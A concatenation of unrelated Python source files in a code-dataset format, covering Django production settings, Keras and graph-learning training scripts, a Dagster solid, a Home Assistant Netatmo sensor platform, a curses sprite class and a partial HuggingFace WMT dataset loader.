AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
"CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_DEFAULT_ACL = None
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# STATIC
# ------------------------
STATICFILES_STORAGE = "config.settings.production.StaticRootS3Boto3Storage"
STATIC_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/static/"
# MEDIA
# ------------------------------------------------------------------------------
# region http://stackoverflow.com/questions/10390244/
# Full-fledge class: https://stackoverflow.com/a/18046120/104731
from storages.backends.s3boto3 import S3Boto3Storage # noqa E402
class StaticRootS3Boto3Storage(S3Boto3Storage):
location = "static"
class MediaRootS3Boto3Storage(S3Boto3Storage):
location = "media"
file_overwrite = False
# endregion
DEFAULT_FILE_STORAGE = "config.settings.production.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[0]["OPTIONS"]["loaders"] = [ # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
"DJANGO_DEFAULT_FROM_EMAIL", default="OSchool <[email protected]>"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env(
"DJANGO_EMAIL_SUBJECT_PREFIX", default="[OSchool]"
)
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail (Mailgun)
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"] # noqa F405
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
ANYMAIL = {
"MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
"MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
}
# Gunicorn
# ------------------------------------------------------------------------------
INSTALLED_APPS += ["gunicorn"] # noqa F405
# Collectfast
# ------------------------------------------------------------------------------
# https://github.com/antonagestam/collectfast#installation
INSTALLED_APPS = ["collectfast"] + INSTALLED_APPS # noqa F405
AWS_PRELOAD_METADATA = True
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"filters": {"require_debug_false": {"()": "django.utils.log.RequireDebugFalse"}},
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"mail_admins": {
"level": "ERROR",
"filters": ["require_debug_false"],
"class": "django.utils.log.AdminEmailHandler",
},
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
},
},
"loggers": {
"django.request": {
"handlers": ["mail_admins"],
"level": "ERROR",
"propagate": True,
},
"django.security.DisallowedHost": {
"level": "ERROR",
"handlers": ["console", "mail_admins"],
"propagate": True,
},
},
}
# Your stuff...
# ------------------------------------------------------------------------------
|
py | 1a40cf558e1098312d27ef9ac9f97df5dd54e535 | #Import required libraries
import os
import cv2
import numpy as np
from tqdm import tqdm
import tensorflow as tf
from random import shuffle
from tensorflow import keras
import matplotlib.pyplot as plt
from tensorflow.keras import models, layers
#Github: https://github.com/sujitmandal
#This programe is create by Sujit Mandal
"""
Github: https://github.com/sujitmandal
This programe is create by Sujit Mandal
LinkedIn : https://www.linkedin.com/in/sujit-mandal-91215013a/
Facebook : https://www.facebook.com/sujit.mandal.33671748
Twitter : https://twitter.com/mandalsujit37
"""
#Read The Dataset
train_images = np.load('Dataset/64/train_images.npy')
train_labels = np.load('Dataset/64/train_labels.npy')
test_images = np.load('Dataset/64/test_images.npy')
test_labels = np.load('Dataset/64/test_labels.npy')
#Normalized
train_images = train_images / 255.0
test_images = test_images / 255.0
image_size = 64
#image_size = int(input('Enter The Image Size [32, 64, 128] :'))
EPOCHS = 20
#Convolutional Neural Network(CNN) building
def build_model():
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(image_size, image_size, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10))
model.compile(optimizer='adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
return model
model = build_model()
ch_path = ('save/64/cp.ckpt')
cp_dir = os.path.dirname(ch_path)
cp_callback = tf.keras.callbacks.ModelCheckpoint(ch_path,
save_weights_only = True,
verbose = 1)
model = build_model()
#Train the model
history = model.fit(train_images, train_labels, epochs=EPOCHS,
validation_data=(test_images, test_labels), callbacks = [cp_callback])
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label = 'val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0.5, 1])
plt.legend(loc='lower right')
plt.show()
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('Accuracy: {:5.2f}%'.format(100*test_acc))
model = build_model()
loss, acc = model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
model.load_weights(ch_path)
loss, acc = model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
ch_path_2 = ('save/64/cp-{epoch:04d}.ckpt')
cp_dir_2 = os.path.dirname(ch_path_2)
cp_callback_2 = tf.keras.callbacks.ModelCheckpoint(ch_path_2,
save_weights_only = True,
verbose = 1,
period = 5)
model = build_model()
#Train the model
history_2 = model.fit(train_images, train_labels,
epochs=EPOCHS,
validation_data=(test_images, test_labels),
callbacks = [cp_callback_2],
verbose = 0
)
latest_model = tf.train.latest_checkpoint(cp_dir_2)
#save
model.save_weights('./save/64/my_save')
#restore
model = build_model()
model.load_weights('./save/64/my_save')
loss, acc = model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
model = build_model()
model.fit(train_images, train_labels, epochs=15)
#save entire model to a HDF5 file
model.save('saved model/64/my_model.h5')
new_model = keras.models.load_model('saved model/64/my_model.h5')
new_model.summary()
loss, acc = new_model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label = 'val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0.5, 1])
plt.legend(loc='lower right')
plt.show()
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('Final Model, accuracy: {:5.2f}%'.format(100*test_acc)) |
py | 1a40cfa0f1ab8260b5c2e1eef9e4d7866c978e1d | # Copyright 2020, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = "0.13dev0"
|
py | 1a40d114b136f3932ce64ce548e8b443cd0bfb7e | from django.apps import AppConfig
class ShopAppConfig(AppConfig):
name = "my_online_shop.shop"
default_auto_field = "django.db.models.BigAutoField"
|
py | 1a40d129176f6893c9307331af8e478ec6688756 | from keras.models import model_from_json
from common import *
def save_model(json_file, weights_file, model):
with open(json_file, 'w') as model_file:
model_file.write(model.to_json())
model.save_weights(weights_file)
def load_model(json_file, weights_file):
with open(json_file, 'r') as jfile:
model = model_from_json(jfile.read())
model.load_weights(weights_file)
return model
def load_base_model(cut_index):
return load_model(
base_model_stem(cut_index) + '.json',
base_model_stem(cut_index) + '.h5')
|
py | 1a40d20e6be8b6e071b5b997c2033f8ab847b6ff | from typing import Optional
from enum import Enum
from pydantic import BaseModel
class messageEnum(str, Enum):
updated = "updated"
class ResponseMessageSchema(BaseModel):
message: messageEnum
details: Optional[str] = None
|
py | 1a40d20e7662b397f9b3465ed8f80a59049cf539 | from datetime import datetime, timezone
from typing import Tuple
from dagster import EventMetadataEntry, Output, OutputDefinition, solid
def binary_search_nearest_left(get_value, start, end, min_target):
mid = (start + end) // 2
while start <= end:
mid = (start + end) // 2
mid_timestamp = get_value(mid)
if mid_timestamp == min_target:
return mid
elif mid_timestamp < min_target:
start = mid + 1
elif mid_timestamp > min_target:
end = mid - 1
if mid == end:
return end + 1
return start
def binary_search_nearest_right(get_value, start, end, max_target):
mid = (start + end) // 2
while start <= end:
mid = (start + end) // 2
mid_timestamp = get_value(mid)
if not mid_timestamp:
end = end - 1
if mid_timestamp == max_target:
return mid
elif mid_timestamp < max_target:
start = mid + 1
elif mid_timestamp > max_target:
end = mid - 1
if end == -1:
return None
if start > end:
return end
return end
def _id_range_for_time(start, end, hn_client):
start = datetime.timestamp(
datetime.strptime(start, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
)
end = datetime.timestamp(
datetime.strptime(end, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
)
def _get_item_timestamp(item_id):
item = hn_client.fetch_item_by_id(item_id)
return item["time"]
max_item_id = hn_client.fetch_max_item_id()
# declared by resource to allow testability against snapshot
min_item_id = hn_client.min_item_id()
start_id = binary_search_nearest_left(_get_item_timestamp, min_item_id, max_item_id, start)
end_id = binary_search_nearest_right(_get_item_timestamp, min_item_id, max_item_id, end)
start_timestamp = str(datetime.fromtimestamp(_get_item_timestamp(start_id), tz=timezone.utc))
end_timestamp = str(datetime.fromtimestamp(_get_item_timestamp(end_id), tz=timezone.utc))
metadata_entries = [
EventMetadataEntry.int(value=max_item_id, label="max_item_id"),
EventMetadataEntry.int(value=start_id, label="start_id"),
EventMetadataEntry.int(value=end_id, label="end_id"),
EventMetadataEntry.int(value=end_id - start_id, label="items"),
EventMetadataEntry.text(text=start_timestamp, label="start_timestamp"),
EventMetadataEntry.text(text=end_timestamp, label="end_timestamp"),
]
id_range = (start_id, end_id)
return id_range, metadata_entries
@solid(
required_resource_keys={"hn_client", "partition_start", "partition_end"},
output_defs=[
OutputDefinition(
Tuple[int, int],
description="The lower (inclusive) and upper (exclusive) ids that bound the range for the partition",
)
],
)
def id_range_for_time(context):
"""
For the configured time partition, searches for the range of ids that were created in that time.
"""
id_range, metadata_entries = _id_range_for_time(
context.resources.partition_start,
context.resources.partition_end,
context.resources.hn_client,
)
yield Output(id_range, metadata_entries=metadata_entries)
|
py | 1a40d3952e9456fd7639b6fd96e762d53c5420c3 | """Support for the Netatmo binary sensors."""
import logging
from pyatmo import NoDevice
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorDevice
from homeassistant.const import CONF_TIMEOUT
from homeassistant.helpers import config_validation as cv
from .const import DATA_NETATMO_AUTH
from . import CameraData
_LOGGER = logging.getLogger(__name__)
# These are the available sensors mapped to binary_sensor class
WELCOME_SENSOR_TYPES = {
"Someone known": "motion",
"Someone unknown": "motion",
"Motion": "motion",
}
PRESENCE_SENSOR_TYPES = {
"Outdoor motion": "motion",
"Outdoor human": "motion",
"Outdoor animal": "motion",
"Outdoor vehicle": "motion",
}
TAG_SENSOR_TYPES = {"Tag Vibration": "vibration", "Tag Open": "opening"}
CONF_HOME = "home"
CONF_CAMERAS = "cameras"
CONF_WELCOME_SENSORS = "welcome_sensors"
CONF_PRESENCE_SENSORS = "presence_sensors"
CONF_TAG_SENSORS = "tag_sensors"
DEFAULT_TIMEOUT = 90
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_CAMERAS, default=[]): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_HOME): cv.string,
vol.Optional(
CONF_PRESENCE_SENSORS, default=list(PRESENCE_SENSOR_TYPES)
): vol.All(cv.ensure_list, [vol.In(PRESENCE_SENSOR_TYPES)]),
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
vol.Optional(CONF_WELCOME_SENSORS, default=list(WELCOME_SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(WELCOME_SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the access to Netatmo binary sensor."""
home = config.get(CONF_HOME)
timeout = config.get(CONF_TIMEOUT)
if timeout is None:
timeout = DEFAULT_TIMEOUT
module_name = None
auth = hass.data[DATA_NETATMO_AUTH]
try:
data = CameraData(hass, auth, home)
if not data.get_camera_names():
return None
except NoDevice:
return None
welcome_sensors = config.get(CONF_WELCOME_SENSORS, WELCOME_SENSOR_TYPES)
presence_sensors = config.get(CONF_PRESENCE_SENSORS, PRESENCE_SENSOR_TYPES)
tag_sensors = config.get(CONF_TAG_SENSORS, TAG_SENSOR_TYPES)
for camera_name in data.get_camera_names():
camera_type = data.get_camera_type(camera=camera_name, home=home)
if camera_type == "NACamera":
if CONF_CAMERAS in config:
if (
config[CONF_CAMERAS] != []
and camera_name not in config[CONF_CAMERAS]
):
continue
for variable in welcome_sensors:
add_entities(
[
NetatmoBinarySensor(
data,
camera_name,
module_name,
home,
timeout,
camera_type,
variable,
)
],
True,
)
if camera_type == "NOC":
if CONF_CAMERAS in config:
if (
config[CONF_CAMERAS] != []
and camera_name not in config[CONF_CAMERAS]
):
continue
for variable in presence_sensors:
add_entities(
[
NetatmoBinarySensor(
data,
camera_name,
module_name,
home,
timeout,
camera_type,
variable,
)
],
True,
)
for module_name in data.get_module_names(camera_name):
for variable in tag_sensors:
camera_type = None
add_entities(
[
NetatmoBinarySensor(
data,
camera_name,
module_name,
home,
timeout,
camera_type,
variable,
)
],
True,
)
class NetatmoBinarySensor(BinarySensorDevice):
"""Represent a single binary sensor in a Netatmo Camera device."""
def __init__(
self, data, camera_name, module_name, home, timeout, camera_type, sensor
):
"""Set up for access to the Netatmo camera events."""
self._data = data
self._camera_name = camera_name
self._module_name = module_name
self._home = home
self._timeout = timeout
if home:
self._name = f"{home} / {camera_name}"
else:
self._name = camera_name
if module_name:
self._name += " / " + module_name
self._sensor_name = sensor
self._name += " " + sensor
self._cameratype = camera_type
self._state = None
@property
def name(self):
"""Return the name of the Netatmo device and this sensor."""
return self._name
@property
def device_class(self):
"""Return the class of this sensor, from DEVICE_CLASSES."""
if self._cameratype == "NACamera":
return WELCOME_SENSOR_TYPES.get(self._sensor_name)
if self._cameratype == "NOC":
return PRESENCE_SENSOR_TYPES.get(self._sensor_name)
return TAG_SENSOR_TYPES.get(self._sensor_name)
@property
def is_on(self):
"""Return true if binary sensor is on."""
return self._state
def update(self):
"""Request an update from the Netatmo API."""
self._data.update()
self._data.update_event()
if self._cameratype == "NACamera":
if self._sensor_name == "Someone known":
self._state = self._data.camera_data.someoneKnownSeen(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Someone unknown":
self._state = self._data.camera_data.someoneUnknownSeen(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Motion":
self._state = self._data.camera_data.motionDetected(
self._home, self._camera_name, self._timeout
)
elif self._cameratype == "NOC":
if self._sensor_name == "Outdoor motion":
self._state = self._data.camera_data.outdoormotionDetected(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Outdoor human":
self._state = self._data.camera_data.humanDetected(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Outdoor animal":
self._state = self._data.camera_data.animalDetected(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Outdoor vehicle":
self._state = self._data.camera_data.carDetected(
self._home, self._camera_name, self._timeout
)
if self._sensor_name == "Tag Vibration":
self._state = self._data.camera_data.moduleMotionDetected(
self._home, self._module_name, self._camera_name, self._timeout
)
elif self._sensor_name == "Tag Open":
self._state = self._data.camera_data.moduleOpened(
self._home, self._module_name, self._camera_name, self._timeout
)
|
py | 1a40d4c8e16a2453a390d0b366dbca9ee83fbb52 | from . import shapes, sprite, clock
import time, math
class Sprite:
def __init__(self, window, x=0, y=0, direction=(0, 0), speed=(0, 0), images=[], image_num=0, color_pair=None, group=None):
self.window = window
self.x = x
self.y = y
self.direction = tuple(direction)
self.speed = tuple(speed)
if color_pair != None:
self.color_pair = tuple(color_pair)
else:
self.color_pair = color_pair
self.images = images
self.image_num = image_num
self.source = self.images[self.image_num].source
self.width = self.images[self.image_num].width
self.height = self.images[self.image_num].height
self.image = self.images[self.image_num].value
self.animation_clock = clock.Clock()
self.group = group
if type(self.group) == list:
self.group.append(self)
def check_bounds(self):
pass
def unrender(self):
for y in range(len(self.image)):
for x in range(len(self.image[y])):
if self.image[y][x] != " " and 0 <= math.floor(self.x) + x <= self.window.width - 2 and 0 <= math.floor(self.y) + y <= self.window.height - 2:
is_changed = not(self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][1:] == [self.window.char, self.window.color_pair])
if not is_changed:
is_changed = self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][0]
self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x] = [is_changed, self.window.char, self.window.color_pair]
def render(self):
for y in range(len(self.image)):
for x in range(len(self.image[y])):
if self.image[y][x] != " " and 0 <= math.floor(self.x) + x <= self.window.width - 2 and 0 <= math.floor(self.y) + y <= self.window.height - 2:
is_changed = not(self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][1:] == [self.image[y][x], self.color_pair])
if not is_changed:
is_changed = self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][0]
self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x] = [is_changed, self.image[y][x], self.color_pair]
def update(self, dt):
self.unrender()
self.x += self.direction[0] * self.speed[0] * dt
self.y += self.direction[1] * self.speed[1] * dt
self.check_bounds()
def animate(self, loop=True, fps=60):
if self.animation_clock.get_dt() >= 1 / fps:
if self.image_num == len(self.images):
if loop:
self.image_num = 0
else:
self.destroy()
return
self.unrender()
self.source = self.images[self.image_num].source
self.width = self.images[self.image_num].width
self.height = self.images[self.image_num].height
self.image = self.images[self.image_num].value
self.image_num += 1
self.animation_clock.update()
self.render()
def destroy(self):
self.unrender()
if self.group:
self.group.remove(self)
def check_group_collision(self, others):
for obj in others:
collided = self.is_collided_with(obj)
if not(collided is self) and collided:
return collided
def is_collided_with(self, other):
if (self.x < other.x + other.width and self.x + self.width > other.x) and (self.y < other.y + other.height and self.y + self.height > other.y) \
and (isinstance(other, shapes.Rect) or isinstance(other, sprite.Sprite)):
return other |
py | 1a40d52b99bd55ccc955144f781ec40ca8bbf3f5 | import copy
import logging
import os
from absl import app
from absl import flags
import torch
from torch.nn.functional import cosine_similarity
from torch.optim import AdamW
from torch.utils.tensorboard import SummaryWriter
from torch_geometric.data import DataLoader
from torch_geometric.datasets import PPI
from tqdm import tqdm
from bgrl import *
log = logging.getLogger(__name__)
FLAGS = flags.FLAGS
flags.DEFINE_integer('seed', None, 'Random seed.')
flags.DEFINE_integer('num_workers', 1, 'Number of CPU workers for dataloader.')
# Dataset.
flags.DEFINE_string('dataset_dir', './data', 'Where the dataset resides.')
# Architecture.
flags.DEFINE_integer('predictor_hidden_size', 4096, 'Hidden size of predictor.')
# Training hyperparameters.
flags.DEFINE_integer('steps', 10000, 'The number of training epochs.')
flags.DEFINE_integer('batch_size', 22, 'Number of graphs used in a batch.')
flags.DEFINE_float('lr', 0.02, 'The learning rate for model training.')
flags.DEFINE_float('weight_decay', 5e-4, 'The value of the weight decay.')
flags.DEFINE_float('mm', 0.99, 'The momentum for moving average.')
flags.DEFINE_integer('lr_warmup_steps', 1000, 'Warmup period for learning rate.')
# Augmentations.
flags.DEFINE_float('drop_edge_p_1', 0., 'Probability of edge dropout 1.')
flags.DEFINE_float('drop_feat_p_1', 0., 'Probability of node feature dropout 1.')
flags.DEFINE_float('drop_edge_p_2', 0., 'Probability of edge dropout 2.')
flags.DEFINE_float('drop_feat_p_2', 0., 'Probability of node feature dropout 2.')
# Logging and checkpoint.
flags.DEFINE_string('logdir', None, 'Where the checkpoint and logs are stored.')
flags.DEFINE_integer('log_steps', 10, 'Log information at every log_steps.')
# Evaluation
flags.DEFINE_integer('eval_steps', 2000, 'Evaluate every eval_epochs.')
def main(argv):
# use CUDA_VISIBLE_DEVICES to select gpu
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
log.info('Using {} for training.'.format(device))
# set random seed
if FLAGS.seed is not None:
log.info('Random seed set to {}.'.format(FLAGS.seed))
set_random_seeds(random_seed=FLAGS.seed)
# create log directory
os.makedirs(FLAGS.logdir, exist_ok=True)
with open(os.path.join(FLAGS.logdir, 'config.cfg'), "w") as file:
file.write(FLAGS.flags_into_string()) # save config file
# setup tensorboard
writer = SummaryWriter(FLAGS.logdir)
# load data
train_dataset = PPI(FLAGS.dataset_dir, split='train')
val_dataset = PPI(FLAGS.dataset_dir, split='val')
test_dataset = PPI(FLAGS.dataset_dir, split='test')
log.info('Dataset {}, graph 0: {}.'.format(train_dataset.__class__.__name__, train_dataset[0]))
# train BGRL using both train and val splits
train_loader = DataLoader(ConcatDataset([train_dataset, val_dataset]), batch_size=FLAGS.batch_size, shuffle=True,
num_workers=FLAGS.num_workers)
# prepare transforms
transform_1 = get_graph_drop_transform(drop_edge_p=FLAGS.drop_edge_p_1, drop_feat_p=FLAGS.drop_feat_p_1)
transform_2 = get_graph_drop_transform(drop_edge_p=FLAGS.drop_edge_p_2, drop_feat_p=FLAGS.drop_feat_p_2)
# build networks
input_size, representation_size = train_dataset.num_node_features, 512
encoder = GraphSAGE_GCN(input_size, 512, 512)
predictor = MLP_Predictor(representation_size, representation_size, hidden_size=FLAGS.predictor_hidden_size)
model = BGRL(encoder, predictor).to(device)
# optimizer
optimizer = AdamW(model.trainable_parameters(), lr=0., weight_decay=FLAGS.weight_decay)
# scheduler
lr_scheduler = CosineDecayScheduler(FLAGS.lr, FLAGS.lr_warmup_steps, FLAGS.steps)
mm_scheduler = CosineDecayScheduler(1 - FLAGS.mm, 0, FLAGS.steps)
def train(data, step):
model.train()
# move data to gpu and transform
data = data.to(device)
x1, x2 = transform_1(data), transform_2(data)
# update learning rate
lr = lr_scheduler.get(step)
for g in optimizer.param_groups:
g['lr'] = lr
# update momentum
mm = 1 - mm_scheduler.get(step)
# forward
optimizer.zero_grad()
q1, y2 = model(x1, x2)
q2, y1 = model(x2, x1)
loss = 2 - cosine_similarity(q1, y2.detach(), dim=-1).mean() - cosine_similarity(q2, y1.detach(), dim=-1).mean()
loss.backward()
# update online network
optimizer.step()
# update target network
model.update_target_network(mm)
# log scalars
writer.add_scalar('params/lr', lr, step)
writer.add_scalar('params/mm', mm, step)
writer.add_scalar('train/loss', loss, step)
def eval(step):
tmp_encoder = copy.deepcopy(model.online_encoder).eval()
train_data = compute_representations(tmp_encoder, train_dataset, device)
val_data = compute_representations(tmp_encoder, val_dataset, device)
test_data = compute_representations(tmp_encoder, test_dataset, device)
val_f1, test_f1 = ppi_train_linear_layer(train_dataset.num_classes, train_data, val_data, test_data, device)
writer.add_scalar('accuracy/val', val_f1, step)
writer.add_scalar('accuracy/test', test_f1, step)
train_iter = iter(train_loader)
for step in tqdm(range(1, FLAGS.steps + 1)):
data = next(train_iter, None)
if data is None:
train_iter = iter(train_loader)
data = next(train_iter, None)
train(data, step)
if step % FLAGS.eval_steps == 0:
eval(step)
# save encoder weights
torch.save({'model': model.online_encoder.state_dict()}, os.path.join(FLAGS.logdir, 'bgrl-wikics.pt'))
if __name__ == "__main__":
log.info('PyTorch version: %s' % torch.__version__)
app.run(main)
|
py | 1a40d533d8d5c814dd8106ab1dd1ee877cd854d1 | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""WMT: Translate dataset."""
import codecs
import functools
import glob
import gzip
import itertools
import os
import re
import xml.etree.cElementTree as ElementTree
from abc import ABC, abstractmethod
import datasets
logger = datasets.logging.get_logger(__name__)
_DESCRIPTION = """\
Translate dataset based on the data from statmt.org.
Versions exists for the different years using a combination of multiple data
sources. The base `wmt_translate` allows you to create your own config to choose
your own data/language pair by creating a custom `datasets.translate.wmt.WmtConfig`.
```
config = datasets.wmt.WmtConfig(
version="0.0.1",
language_pair=("fr", "de"),
subsets={
datasets.Split.TRAIN: ["commoncrawl_frde"],
datasets.Split.VALIDATION: ["euelections_dev2019"],
},
)
builder = datasets.builder("wmt_translate", config=config)
```
"""
CWMT_SUBSET_NAMES = ["casia2015", "casict2011", "casict2015", "datum2015", "datum2017", "neu2017"]
class SubDataset:
"""Class to keep track of information on a sub-dataset of WMT."""
def __init__(self, name, target, sources, url, path, manual_dl_files=None):
"""Sub-dataset of WMT.
Args:
name: `string`, a unique dataset identifier.
target: `string`, the target language code.
sources: `set<string>`, the set of source language codes.
url: `string` or `(string, string)`, URL(s) or URL template(s) specifying
where to download the raw data from. If two strings are provided, the
first is used for the source language and the second for the target.
Template strings can either contain '{src}' placeholders that will be
filled in with the source language code, '{0}' and '{1}' placeholders
that will be filled in with the source and target language codes in
alphabetical order, or all 3.
path: `string` or `(string, string)`, path(s) or path template(s)
specifing the path to the raw data relative to the root of the
downloaded archive. If two strings are provided, the dataset is assumed
to be made up of parallel text files, the first being the source and the
second the target. If one string is provided, both languages are assumed
to be stored within the same file and the extension is used to determine
how to parse it. Template strings should be formatted the same as in
`url`.
manual_dl_files: `<list>(string)` (optional), the list of files that must
be manually downloaded to the data directory.
"""
self._paths = (path,) if isinstance(path, str) else path
self._urls = (url,) if isinstance(url, str) else url
self._manual_dl_files = manual_dl_files if manual_dl_files else []
self.name = name
self.target = target
self.sources = set(sources)
def _inject_language(self, src, strings):
"""Injects languages into (potentially) template strings."""
if src not in self.sources:
raise ValueError("Invalid source for '{0}': {1}".format(self.name, src))
def _format_string(s):
if "{0}" in s and "{1}" and "{src}" in s:
return s.format(*sorted([src, self.target]), src=src)
elif "{0}" in s and "{1}" in s:
return s.format(*sorted([src, self.target]))
elif "{src}" in s:
return s.format(src=src)
else:
return s
return [_format_string(s) for s in strings]
def get_url(self, src):
return self._inject_language(src, self._urls)
def get_manual_dl_files(self, src):
return self._inject_language(src, self._manual_dl_files)
def get_path(self, src):
return self._inject_language(src, self._paths)
# Subsets used in the training sets for various years of WMT.
_TRAIN_SUBSETS = [
# pylint:disable=line-too-long
SubDataset(
name="commoncrawl",
target="en", # fr-de pair in commoncrawl_frde
sources={"cs", "de", "es", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt13/resolve/main/training-parallel-commoncrawl.tgz",
path=("commoncrawl.{src}-en.{src}", "commoncrawl.{src}-en.en"),
),
SubDataset(
name="commoncrawl_frde",
target="de",
sources={"fr"},
url=(
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/commoncrawl.fr.gz",
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/commoncrawl.de.gz",
),
path=("", ""),
),
SubDataset(
name="czeng_10",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng/czeng10",
manual_dl_files=["data-plaintext-format.%d.tar" % i for i in range(10)],
# Each tar contains multiple files, which we process specially in
# _parse_czeng.
path=("data.plaintext-format/??train.gz",) * 10,
),
SubDataset(
name="czeng_16pre",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng/czeng16pre",
manual_dl_files=["czeng16pre.deduped-ignoring-sections.txt.gz"],
path="",
),
SubDataset(
name="czeng_16",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng",
manual_dl_files=["data-plaintext-format.%d.tar" % i for i in range(10)],
# Each tar contains multiple files, which we process specially in
# _parse_czeng.
path=("data.plaintext-format/??train.gz",) * 10,
),
SubDataset(
# This dataset differs from the above in the filtering that is applied
# during parsing.
name="czeng_17",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng",
